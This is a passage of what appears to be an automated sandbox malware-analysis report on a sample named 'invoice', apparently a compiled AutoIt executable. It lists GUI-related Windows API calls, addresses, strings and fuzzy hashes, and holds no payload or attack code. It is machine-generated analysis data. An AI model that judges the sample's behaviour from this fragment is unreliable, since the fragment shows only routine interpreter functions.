                        • GetSysColor.USER32(00000012), ref: 0100A935
                        • SetTextColor.GDI32(?,?), ref: 0100A939
                        • GetSysColorBrush.USER32(0000000F), ref: 0100A94F
                        • GetSysColor.USER32(0000000F), ref: 0100A95A
                        • CreateSolidBrush.GDI32(?), ref: 0100A95F
                        • GetSysColor.USER32(00000011), ref: 0100A977
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100A985
                        • SelectObject.GDI32(?,00000000), ref: 0100A996
                        • SetBkColor.GDI32(?,00000000), ref: 0100A99F
                        • SelectObject.GDI32(?,?), ref: 0100A9AC
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A9CB
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100A9E2
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0100A9F7
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100AA1F
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0100AA46
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0100AA64
                        • DrawFocusRect.USER32(?,?), ref: 0100AA6F
                        • GetSysColor.USER32(00000011), ref: 0100AA7D
                        • SetTextColor.GDI32(?,00000000), ref: 0100AA85
                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0100AA99
                        • SelectObject.GDI32(?,0100A62C), ref: 0100AAB0
                        • DeleteObject.GDI32(?), ref: 0100AABB
                        • SelectObject.GDI32(?,?), ref: 0100AAC1
                        • DeleteObject.GDI32(?), ref: 0100AAC6
                        • SetTextColor.GDI32(?,?), ref: 0100AACC
                        • SetBkColor.GDI32(?,?), ref: 0100AAD6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: 209159e4389bd4e76d7cdf4b76d8c737468845e676e0862242b34d0eb47f2f5a
                        • Instruction ID: c0a5c77bfffc0abb29112212c80e209a9d321cee45f8d1985038436cdedfc2e7
                        • Opcode Fuzzy Hash: 209159e4389bd4e76d7cdf4b76d8c737468845e676e0862242b34d0eb47f2f5a
                        • Instruction Fuzzy Hash: 54515D71900209FFEB229FA4DC48EAE7BB9EB09320F114615FA51AB2D1D7769940DF90
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01008AF3
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008B04
                        • CharNextW.USER32(0000014E), ref: 01008B33
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01008B74
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01008B8A
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008B9B
                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01008BB8
                        • SetWindowTextW.USER32(?,0000014E), ref: 01008C0A
                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01008C20
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01008C51
                        • _memset.LIBCMT ref: 01008C76
                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01008CBF
                        • _memset.LIBCMT ref: 01008D1E
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01008D48
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 01008DA0
                        • SendMessageW.USER32(?,0000133D,?,?), ref: 01008E4D
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 01008E6F
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01008EB9
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01008EE6
                        • DrawMenuBar.USER32(?), ref: 01008EF5
                        • SetWindowTextW.USER32(?,0000014E), ref: 01008F1D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                        • String ID: 0
                        • API String ID: 1073566785-4108050209
                        • Opcode ID: c2618716af0c6c527d0e4ad9388708907d7b967d0f0d41d5fc99feb767b11160
                        • Instruction ID: 0240d2d122b56709a58db6a73fa7df83c4de42225d979ac673b572692e63eb32
                        • Opcode Fuzzy Hash: c2618716af0c6c527d0e4ad9388708907d7b967d0f0d41d5fc99feb767b11160
                        • Instruction Fuzzy Hash: 0FE17270900209ABEF629F64CC84EEE7BB9FF05750F00819AFA959A2D1D7758681DF50
                        APIs
                        • GetCursorPos.USER32(?), ref: 01004A33
                        • GetDesktopWindow.USER32 ref: 01004A48
                        • GetWindowRect.USER32(00000000), ref: 01004A4F
                        • GetWindowLongW.USER32(?,000000F0), ref: 01004AB1
                        • DestroyWindow.USER32(?), ref: 01004ADD
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01004B06
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01004B24
                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01004B4A
                        • SendMessageW.USER32(?,00000421,?,?), ref: 01004B5F
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01004B72
                        • IsWindowVisible.USER32(?), ref: 01004B92
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01004BAD
                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01004BC1
                        • GetWindowRect.USER32(?,?), ref: 01004BD9
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 01004BFF
                        • GetMonitorInfoW.USER32(00000000,?), ref: 01004C19
                        • CopyRect.USER32(?,?), ref: 01004C30
                        • SendMessageW.USER32(?,00000412,00000000), ref: 01004C9B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: 23cc73f8bc452fea6587c33d3bed158d907d37ab2c10fc216fafba34d622668d
                        • Instruction ID: 9c911d750c7f81dc738889e4db6211f6087ce4e61889357ce4263d17acb8b55a
                        • Opcode Fuzzy Hash: 23cc73f8bc452fea6587c33d3bed158d907d37ab2c10fc216fafba34d622668d
                        • Instruction Fuzzy Hash: 3BB18C71608301AFEB55DF24C848B6ABBE4FF89310F04891CF6D99B291DB75E805CB59
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828BC
                        • GetSystemMetrics.USER32(00000007), ref: 00F828C4
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828EF
                        • GetSystemMetrics.USER32(00000008), ref: 00F828F7
                        • GetSystemMetrics.USER32(00000004), ref: 00F8291C
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F82939
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F82949
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F8297C
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F82990
                        • GetClientRect.USER32(00000000,000000FF), ref: 00F829AE
                        • GetStockObject.GDI32(00000011), ref: 00F829CA
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F829D5
                          • Part of subcall function 00F82344: GetCursorPos.USER32(?), ref: 00F82357
                          • Part of subcall function 00F82344: ScreenToClient.USER32(010457B0,?), ref: 00F82374
                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000001), ref: 00F82399
                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                        • SetTimer.USER32(00000000,00000000,00000028,00F81256), ref: 00F829FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 23e860954b0a0f62cc159d540c11e002ac17a04f1e158da1f20b25e3657f4b37
                        • Instruction ID: 81dbe0ab160b73c1f1aa5eea199660e4e5bf17025d48bc63e87db0e621ebd3be
                        • Opcode Fuzzy Hash: 23e860954b0a0f62cc159d540c11e002ac17a04f1e158da1f20b25e3657f4b37
                        • Instruction Fuzzy Hash: 36B18171A0020ADFDB24EFA8DC85BEE77B4FB08711F104129FA55A7294DB79A801EB50
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDA885
                        • __swprintf.LIBCMT ref: 00FDA926
                        • _wcscmp.LIBCMT ref: 00FDA939
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FDA98E
                        • _wcscmp.LIBCMT ref: 00FDA9CA
                        • GetClassNameW.USER32(?,?,00000400), ref: 00FDAA01
                        • GetDlgCtrlID.USER32(?), ref: 00FDAA53
                        • GetWindowRect.USER32(?,?), ref: 00FDAA89
                        • GetParent.USER32(?), ref: 00FDAAA7
                        • ScreenToClient.USER32(00000000), ref: 00FDAAAE
                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDAB28
                        • _wcscmp.LIBCMT ref: 00FDAB3C
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00FDAB62
                        • _wcscmp.LIBCMT ref: 00FDAB76
                          • Part of subcall function 00FA37AC: _iswctype.LIBCMT ref: 00FA37B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                        • String ID: %s%u
                        • API String ID: 3744389584-679674701
                        • Opcode ID: 7216dbb34495ccc847159015cdf95e95b0b496bf4d7fbd0aa4feef3d22c9ab46
                        • Instruction ID: 8d4a5c7e49417af704896d4311c649b8699fa6a97487b4aa38df3b2c2b4e7daf
                        • Opcode Fuzzy Hash: 7216dbb34495ccc847159015cdf95e95b0b496bf4d7fbd0aa4feef3d22c9ab46
                        • Instruction Fuzzy Hash: 41A1F571604702AFD715DF20C884FAAB7EAFF44324F08461BF999C2250D734E946EB96
                        APIs
                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00FDB1DA
                        • _wcscmp.LIBCMT ref: 00FDB1EB
                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FDB213
                        • CharUpperBuffW.USER32(?,00000000), ref: 00FDB230
                        • _wcscmp.LIBCMT ref: 00FDB24E
                        • _wcsstr.LIBCMT ref: 00FDB25F
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB297
                        • _wcscmp.LIBCMT ref: 00FDB2A7
                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FDB2CE
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB317
                        • _wcscmp.LIBCMT ref: 00FDB327
                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00FDB34F
                        • GetWindowRect.USER32(00000004,?), ref: 00FDB3B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                        • String ID: @$ThumbnailClass
                        • API String ID: 1788623398-1539354611
                        • Opcode ID: 658cf3ec8c20ad8846fca3f0d35a1b8a787b26eead4602ac569942062e160cfe
                        • Instruction ID: 125bc695552d70271f9a78e2b9be2ac4a6cdb53c5e5ced27c642bf4daa41709f
                        • Opcode Fuzzy Hash: 658cf3ec8c20ad8846fca3f0d35a1b8a787b26eead4602ac569942062e160cfe
                        • Instruction Fuzzy Hash: BD81D172408306DBDB11DF10C881FAA77E9FF44724F08856AFD898A296DB34DD45EB61
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 1038674560-1810252412
                        • Opcode ID: 11fd8ac6b3cfa6df9c9e240a8f68899797459d44c634702a478b2640dc4abbb1
                        • Instruction ID: e0204872483cfe63242f3c3f7474732508185ad12690bd5c377d706f02d36c30
                        • Opcode Fuzzy Hash: 11fd8ac6b3cfa6df9c9e240a8f68899797459d44c634702a478b2640dc4abbb1
                        • Instruction Fuzzy Hash: BD31ED71A44709E6DB24FAA1CC47FEF73A99F50B20F28001AB491751D2EF65AF05F650
                        APIs
                        • LoadIconW.USER32(00000063), ref: 00FDC2D3
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FDC2E5
                        • SetWindowTextW.USER32(?,?), ref: 00FDC2FC
                        • GetDlgItem.USER32(?,000003EA), ref: 00FDC311
                        • SetWindowTextW.USER32(00000000,?), ref: 00FDC317
                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC327
                        • SetWindowTextW.USER32(00000000,?), ref: 00FDC32D
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FDC34E
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FDC368
                        • GetWindowRect.USER32(?,?), ref: 00FDC371
                        • SetWindowTextW.USER32(?,?), ref: 00FDC3DC
                        • GetDesktopWindow.USER32 ref: 00FDC3E2
                        • GetWindowRect.USER32(00000000), ref: 00FDC3E9
                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FDC435
                        • GetClientRect.USER32(?,?), ref: 00FDC442
                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FDC467
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FDC492
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: a9bbf4466465a3ac9fa2f72bf0101bab93243329dd1490790d5c55b070bd889b
                        • Instruction ID: 944b017c306018b16cdf73691b75fc1ec79e64e87022191676165274427d2158
                        • Opcode Fuzzy Hash: a9bbf4466465a3ac9fa2f72bf0101bab93243329dd1490790d5c55b070bd889b
                        • Instruction Fuzzy Hash: 5B519D3190070AEFDB31DFA8DD85B6EBBB6FF08714F044519E582A26A0CB75A904EB50
                        APIs
                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00FF5129
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FF5134
                        • LoadCursorW.USER32(00000000,00007F03), ref: 00FF513F
                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00FF514A
                        • LoadCursorW.USER32(00000000,00007F01), ref: 00FF5155
                        • LoadCursorW.USER32(00000000,00007F81), ref: 00FF5160
                        • LoadCursorW.USER32(00000000,00007F88), ref: 00FF516B
                        • LoadCursorW.USER32(00000000,00007F80), ref: 00FF5176
                        • LoadCursorW.USER32(00000000,00007F86), ref: 00FF5181
                        • LoadCursorW.USER32(00000000,00007F83), ref: 00FF518C
                        • LoadCursorW.USER32(00000000,00007F85), ref: 00FF5197
                        • LoadCursorW.USER32(00000000,00007F82), ref: 00FF51A2
                        • LoadCursorW.USER32(00000000,00007F84), ref: 00FF51AD
                        • LoadCursorW.USER32(00000000,00007F04), ref: 00FF51B8
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00FF51C3
                        • LoadCursorW.USER32(00000000,00007F89), ref: 00FF51CE
                        • GetCursorInfo.USER32(?), ref: 00FF51DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Cursor$Load$Info
                        • String ID:
                        • API String ID: 2577412497-0
                        • Opcode ID: e5d3ae3c137a68274354679b2f7d625d445cc8630eca824b886be9d1002335f4
                        • Instruction ID: 0c271becba7506499f4741e7b97acc516f1fef20f1a1b4937db963ccc66f9090
                        • Opcode Fuzzy Hash: e5d3ae3c137a68274354679b2f7d625d445cc8630eca824b886be9d1002335f4
                        • Instruction Fuzzy Hash: FD3107B1D4831D6ADB209FB68C8996EBEE8FF04750F50452AE64DE7280DB7865009F91
                        APIs
                        • _memset.LIBCMT ref: 0100A28B
                        • DestroyWindow.USER32(?,?), ref: 0100A305
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0100A37F
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0100A3A1
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A3B4
                        • DestroyWindow.USER32(00000000), ref: 0100A3D6
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F80000,00000000), ref: 0100A40D
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A426
                        • GetDesktopWindow.USER32 ref: 0100A43F
                        • GetWindowRect.USER32(00000000), ref: 0100A446
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0100A45E
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0100A476
                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                        • String ID: 0$tooltips_class32
                        • API String ID: 1297703922-3619404913
                        • Opcode ID: e6a4c9efaf88bcced3cece726403ba7ccd23c902aee2c4d97e040e91888bb3aa
                        • Instruction ID: ed0d375f4e798b6a2614fe4d5e73d7234398b953bcc3cc4a6ea242e7ef1a537c
                        • Opcode Fuzzy Hash: e6a4c9efaf88bcced3cece726403ba7ccd23c902aee2c4d97e040e91888bb3aa
                        • Instruction Fuzzy Hash: 88719975244345AFE722CF28CC48F6A7BE5FB88700F04455CF9C59B2A0CB75A902DB21
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DragQueryPoint.SHELL32(?,?), ref: 0100C691
                          • Part of subcall function 0100AB69: ClientToScreen.USER32(?,?), ref: 0100AB92
                          • Part of subcall function 0100AB69: GetWindowRect.USER32(?,?), ref: 0100AC08
                          • Part of subcall function 0100AB69: PtInRect.USER32(?,?,0100C07E), ref: 0100AC18
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C6FA
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0100C705
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0100C728
                        • _wcscat.LIBCMT ref: 0100C758
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0100C76F
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C788
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0100C79F
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0100C7C1
                        • DragFinish.SHELL32(?), ref: 0100C7C8
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0100C8BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 169749273-3440237614
                        • Opcode ID: 601e7561b8d903dd4a2fcc22fb20f96681fdf6044da373022c83e48cf1c3ae95
                        • Instruction ID: 86bacff78d74b2322e43c1d48c68ef096d4e485b4a0ad27c9583296bb9263e00
                        • Opcode Fuzzy Hash: 601e7561b8d903dd4a2fcc22fb20f96681fdf6044da373022c83e48cf1c3ae95
                        • Instruction Fuzzy Hash: E7618971108301AFD712EF60CC85D9FBBE8FF88750F000A5EF691961A1DB759A09DB92
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 0100448D
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010044D8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 3974292440-4258414348
                        • Opcode ID: cc53d75635165e97582d58c82114b1cf5a920625816d77d21f5158f722c74b1f
                        • Instruction ID: 50c456321abb147300d7b7c0054d1ee080e9fab16e64145e6d733756e261c2df
                        • Opcode Fuzzy Hash: cc53d75635165e97582d58c82114b1cf5a920625816d77d21f5158f722c74b1f
                        • Instruction Fuzzy Hash: 1291AD702087018FDA15EF10C891AADB7E1AF84314F08449DF9D69B3A2DB79ED0ADB81
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0100B8E8
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,01006B43,?), ref: 0100B944
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100B97D
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0100B9C0
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100B9F7
                        • FreeLibrary.KERNEL32(?), ref: 0100BA03
